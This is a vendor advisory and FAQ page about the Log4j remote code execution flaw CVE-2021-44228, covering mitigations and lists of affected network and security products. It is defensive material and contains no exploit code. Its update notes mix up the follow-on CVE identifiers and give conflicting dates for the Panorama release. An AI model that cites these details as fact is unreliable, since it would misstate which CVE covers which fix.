Apache Log4j Remote Code Execution vulnerability CVE-2021-44228

Last updated: 2021-12-21 10:50 hr

On Friday the 10th of December 2021 CVE 2021-44228 was published describing a remote code execution vulnerability in Apache log4j. On this website, we explain the situation and answer frequently asked questions. This page is updated on a regular basis.

Vulnerabilities themselves are common, however, this vulnerability allows an attacker to run code on the affected system. This could potentially bring the service down, be used to steal sensitive information, infect other systems, to encrypt files or anything else the attacker can think of. To make it even worse, the code to exploit this vulnerability has been shared with the internet so anyone with basic system skills could use this code to do harm. As a result of this code being available, massive scans are seen on the internet of people trying to identify vulnerable systems.

UPDATE: On the 14th of December, CVE-2021-45046 was released describing that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. Log4j 2.16.0 fixes this issue by removing support for message lookup patterns and disabling JNDI functionality by default.

UPDATE 2: On the 18th of December, CVE-2021-30546 was released describing the fix of CVE-2021-45105 in Apache Log4j 2.16.0 was incomplete due to the lack of protection against uncontrolled recursion from self-referential lookup. In addition, the severity of CVE-2021-45046 has been changed from 3.7 to 9 as it not only allows for a DoS attack, it can also be used for data exfiltration.

UPDATE 3: On the 18th of December, Palo Alto updated their security advisory regards Panorama. PAN-OS for Panorama with versions 9.0.*, 9.1.*, 10.0. are affected and a new software release is planned to be available on the 22nd of December.

UPDATE 4: On the 21st of December, Palo Alto updated their security advisory regards Panorama. A new software release is available for Panorama to remediate the issues caused by Apache Log4j2 Remote Code Execution vulnerability CVE-2021-44228. More information below.

Frequently Asked Questions

1. Q: Am I affected?

A: If you (or your supplier) is running Apache log4j 2.0 up to 2.16.0, you are affected.

2. Q: Can Nomios help me determine if any of my systems is affected?

A: Yes, we can assist by delivering vulnerability scanning for Log4j and other vulnerabilities. Please contact your account executive, or get in touch with us via our contact page.

3. Q: What can I do if I’m affected?

A: There are several things you can do to mitigate the threat:

  • Update to Apache log4j version 2.17.0 or later
  • If updating is not possible, follow the workaround described here: https://logging.apache.org/log4j/2.x/security.html
  • Protect the system by adding a security device like a Web Application Firewall or Next-generation firewall with the right protective measures in front of the service
  • Disable the service

4. Q: Nomios delivers a managed network monitoring service to my organisation. Can this vulnerability in the Nomios monitoring platform be used as an attack vector on my organisation?

A: No. Our monitoring platform is not affected by the vulnerability.

5. Q: I’m a customer of a Nomios managed security service. Can the devices/platforms managed by Nomios be used as an attack vector?

A: On the 10th of December we have assessed all solutions managed my Nomios as part of managed security services (e.g. Managed Detection & Response, Managed EDR, Managed NDR). The majority of the solutions were not vulnerable. Vulnerable devices were properly patched to mitigate the threat. Before the moment of patching, no signs of compromise are observed.

6. Q: Can my firewall detect exploitation of the vulnerability?

A: Exploitation attempts can only be detected and blocked if affected systems are behind the firewall and relevant detection features (e.g. SSL inspection) are enabled combined with the appropriate next-generation features.

7. Q: I bought a networking or security product from Nomios. Is this affected?

A: Several products use the Apache suite for management. Below, you can find a list of our vendors and their affected list. This list is updated on a regular basis.

Vendor information

F5 Networks

F5 published a statement that NONE of their BIG-IP and BIG-IQ devices are vulnerable. This includes these platforms and their models. Please refer to the link below for more information:

https://support.f5.com/csp/article/K19026212

In addition, the F5 platform can be used to protect an affected environment through the use of an iRule to mitigate the risk or via an AWAF signature.

Fortinet

The following Fortinet products are affected:

  • FortiSIEM
  • FortiCASB
  • FortiPortal
  • FortiNAC
  • FortiConvertor
  • FortiAIOps
  • FortiNAC
  • FortiPolicy
  • ShieldX
  • FortiSOAR
  • FortiEDR Cloud

If you run affected products, please ensure these systems are isolated from the internet wherever possible. Further details for Fortinet can be found below:

https://www.fortiguard.com/psirt/FG-IR-21-245

https://www.fortiguard.com/outbreak-alert/log4j2-vulnerability

Juniper Networks

Apache Log4j2 JNDI features do not protect against attacker-controlled LDAP and other JNDI related endpoints.

PROBLEM:
A vulnerability in Apache Log4j2 <=2.14.1 JNDI features used in multiple Juniper Networks products as used in the configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behaviour has been disabled by default. In previous releases (>2.10) this behavior can be mitigated by setting system property "log4j2.formatMsgNoLookups" to “true” or by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class).

Based on the current analysis the following products may be affected by this issue:

  • JSA Series
  • Junos Space Management Applications
  • Junos Space Network Management Platform
  • Network Director
  • Secure Analytics
  • Security Director, but not Security Director Insights

Based on the current analysis the following products are vulnerable to this issue:

  • Juniper Networks Paragon Active Assurance

21 version 21.1 and later versions;
22 version 22.2 and later versions.
Juniper Networks Paragon Insights

21 version 21.1 and later versions;
22 version 22.2 and later versions.

  • Juniper Networks Paragon Pathfinder

21 version 21.1 and later versions;
22 version 22.2 and later versions.

  • Juniper Networks Paragon Planner

21 version 21.1 and later versions;
22 version 22.2 and later versions.

More information:

https://kb.juniper.net/InfoCenter/index?page=content&id=JSA11259&cat=SIRT_1&actp=LIST

Earlier blog post:

https://blogs.juniper.net/en-us/enterprise-cloud-and-transformation/apache-log4j-vulnerability-cve-2021-44228-raises-widespread-concerns

Cisco

Cisco has released a very extensive list of products that are under investigation, vulnerable or not vulnerable/already remediated. At the time of writing, major firewall solutions such as ASA and FTD are still being investigated as well as most of the Nexus switch lineup. A large number of management platforms was confirmed to be vulnerable for which Bug ID’s were created.

Since the list is too dynamic and extensive to post here, please refer to the list below for more details:

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd

Palo Alto Networks

Initially, Palo Alto mentioned there was no impact on their products. However, on the 18th of December, Palo Alto updated their security advisory regards Panorama. PAN-OS for Panorama with versions 9.0.*, 9.1.*, 10.0. are affected and a new software release is planned to be available on the 21st of December. Panorama appliances with PAN-OS 9.0, PAN-OS 9.1, and PAN-OS 10.0 are impacted by these vulnerabilities through the use of Elasticsearch.

If Panorama is running an impacted version of PAN-OS, and you are able to upgrade to PAN-OS 10.1, upgrade all appliances in affected Collector Groups to the latest PAN-OS 10.1 Preferred release (PAN-OS 10.1.3-h1) to remediate these issues.

https://security.paloaltonetworks.com/CVE-2021-44228

https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/

Netscout Arbor

Netscout confirms that no Arbor products are affected as Java was never part of this product line.

Arista Networks

These Arista products are affected:

  • CloudVision WiFi, virtual appliance or physical appliance
  • CloudVision WiFi cloud service delivery
  • Analytics Node for DANZ Monitoring Fabric (formerly Big Monitoring Fabric)
  • Analytics Node for Converged Cloud Fabric (formerly Big Cloud Fabric)
  • Embedded Analytics for Converged Cloud Fabric (formerly Big Cloud Fabric)

More information can be found here:

https://www.arista.com/en/support/advisories-notices/security-advisories/13425-security-advisory-0070

Ivanti Pulse Secure

Ivanti states that after investigation, no Pulse Secure products are affected:

https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44933

Vectra

Vectra products are not affected by the vulnerability.

More information can be found here:

https://www.vectra.ai/blogpost/cve-2021-44228-log4j-zero-day-affecting-the-internet

Others

In addition to the vendors mentioned above, the Dutch National Cyber Security Center has created a list of the affected software. Please refer to the link below for vendors not mentioned above:

https://github.com/NCSC-NL/log4shell/blob/main/software/README.md

We will continue to update this page and add more questions & answers in the upcoming hours and days. So please revisit this page to get more updates.

Updates

Latest news and blog posts